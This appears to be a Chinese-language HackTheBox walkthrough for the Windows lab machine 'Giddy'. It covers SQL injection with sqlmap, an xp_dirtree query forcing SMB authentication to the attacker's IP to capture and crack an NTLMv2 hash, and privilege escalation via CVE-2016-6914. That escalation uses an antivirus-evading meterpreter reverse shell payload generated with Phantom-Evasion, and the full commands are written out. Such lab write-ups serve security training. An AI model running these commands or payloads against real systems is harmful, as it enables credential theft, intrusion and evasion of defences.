Skip to content

Latest commit

 

History

History
229 lines (120 loc) · 11.6 KB

HackTheBox-windows-Giddy.md

File metadata and controls

229 lines (120 loc) · 11.6 KB
Raw

本文由 简悦 SimpRead 转码, 原文地址 mp.weixin.qq.com

大余安全  

一个每日分享渗透小技巧的公众号

大家好,这里是 大余安全 的第 78 篇文章,本公众号会每日分享攻防渗透技术给大家。

靶机地址:https://www.hackthebox.eu/home/machines/profile/153

靶机难度:中级(5.0/10)

靶机发布日期:2019 年 2 月 12 日

靶机描述:

Giddy is a medium difficulty machine, which highlights how low privileged SQL Server logins can be used to compromise the underlying SQL Server service account. This is an issue in many environments, and depending on the configuration, the service account may have elevated privileges across the domain. It also features Windows registry enumeration and custom payload creation.

请注意:对于所有这些计算机,我是通过平台授权允许情况进行渗透的。我将使用 Kali Linux 作为解决该 HTB 的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。

一、信息收集

可以看到靶机的 IP 是 10.10.10.90....

这里的思路:

Giddy 是一台中等难度的计算机,它着重介绍了如何使用低特权的 SQL Server 登录名来破坏基础 SQL Server 服务帐户。在许多环境中,这是一个问题,根据配置,服务帐户可能在整个域中具有提升的特权。它还具有 Windows 注册表枚举和自定义有效负载创建的功能。

nmap 发现开放了 80 和 443 端口,并且 windows server IIS 10.0....3389 端口也开放着...

https 页面还可以使用 powershell... 那就进入页面就能成功了...

一条可爱的狗...443 端口也是一模一样的界面...

这里直接利用 gobuster 爆破目录好了...

gobuster dir -w directory-list-2.3-medium.txt -u http://10.10.10.104/

发现了 / remote 目录,访问...

可以看到重定向到了 Windows PowerShell Web Access...

提醒我们该网站使用安全套接字层(SSL)协议,并且需要 HTTPS 地址...

OK,按照他说做...

这里需要用户名和密码进行登陆,目前都没... 继续访问 mvc...

登陆这是一个产品列表,进去可以看到价格...

关注到该页面地址:

https://10.10.10.104/mvc/Product.aspx?ProductSubCategoryId=26

随意加个字符,发现存在 sql 错误信息... 提示引号字符串错误... 这里利用 sqlmap 注入看...

可以看到,正在以 MSSQL 作为 DBMS 运行着... 可以强制 MSSQL 服务器重新连接以与 SMB 一起使用,然后使用响应程序来获取 NTLMv2 哈希...

MSSQL 支持堆叠查询,因此可以创建一个指向我们 IP 地址的变量,然后使用该 xp_dirtree 函数列出 SMB 共享中的文件并获取 NTLMv2 哈希.

python3 smbserver.py dayu pwd
sqlmap -u http://10.10.10.104/mvc/Product.aspx?ProductSubCategoryId=26 --sql-shell
EXEC master..xp_dirtree '\\10.10.14.11\dayu'

成功获得用户和哈希值...

利用 john 解析了密码:

xNnWo6272k7x

成功登陆... 果然前面 nmap 也发现了 powershell...

直接利用即可...

成功获得 user 信息....

unifivideo 是一个功能强大且灵活的集成 IP 视频管理监视系统,在与 Ubiquiti 的 UniFi Video Camera 产品系列一起使用,UniFi Video 具有直观,可配置和功能丰富的用户界面,具有高级功能,例如运动检测,自动发现,用户级安全性,存储管理,报告和移动设备支持...

可以看到 unifivideo 可利用得漏洞 CVE-2016-6914,使用 43390EXP 进行提权...

在启动 Ubiquiti UniFi Video 服务时,它将尝试执行一个名为的文件 taskkill.exe 程序,只需要将创建好的恶意程序放置到 taskkill.exe 中,然后重新启动服务即可提权... 按照 EXP 的意思做...

确认是存在 UniFi Video 的...

本地创建一个 taskkill.exe 的 shellcode... 然后上传即可...

没成功....

可以发现程序没了... 有防病毒模块开启着,把我在启动 Ubiquiti UniFi Video 服务后,立马删除了...

这里利用

[Phantom-Evasion](https://github.com/oddcod3/Phantom-Evasion)

程序进行绕过... 很强大的工具...

python3 phantom-evasion.py --setup 记得更新包...

**介绍:**Phantom-Evasion 是一种使用 python 编写的防病毒逃避工具(均与 python 和 python3 兼容),即使使用最常见的 x86 msfvenom 有效负载,它也能够生成(几乎)完全无法检测到的可执行文件...

这里有帮助命令...GO

这里利用直接生成欺骗性恶意程序....:Windows Shell 代码注入,输出带有欺骗性 https 证书的签名 exe,本地执行方法:线程,内存:Virtual_RWX,加密:vigenere....

python3 phantom-evasion.py -m WSI -msfp windows/meterpreter/reverse_tcp -H 10.10.14.11 -P 4444 -i Thread -e 4 -mem Virtual_RWX -j 1 -J 15 -jr 0 -E 5 -c www.windows.com:443 -f exe -o taskkill.exe

生成 taskkill.exe... 导入即可提权...

开启 MSF 监听方便点... 然后上传 taskkill... 成功提权获得 root 信息...

这里还可以利用:

https://github.com/paranoidninja/ScriptDotSh-MalwareDevelopment/blob/master/prometheus.cpp

或者 Ebowla github 封装 msf 生成的. exe

等等,应该还有很多方法绕开提权....

由于我们已经成功得到 root 权限查看 user.txt 和 root.txt,因此完成了靶机,希望你们喜欢这台机器,请继续关注大余后期会有更多具有挑战性的机器,一起练习学习。

如果你有其他的方法,欢迎留言。要是有写错了的地方,请你一定要告诉我。要是你觉得这篇博客写的还不错,欢迎分享给身边的人。

如果觉得这篇文章对你有帮助,可以转发到朋友圈,谢谢小伙伴~

随缘收徒中~~ 随缘收徒中~~ 随缘收徒中~~

欢迎加入渗透学习交流群,想入群的小伙伴们加我微信,共同进步共同成长!

大余安全

一个全栈渗透小技巧的公众号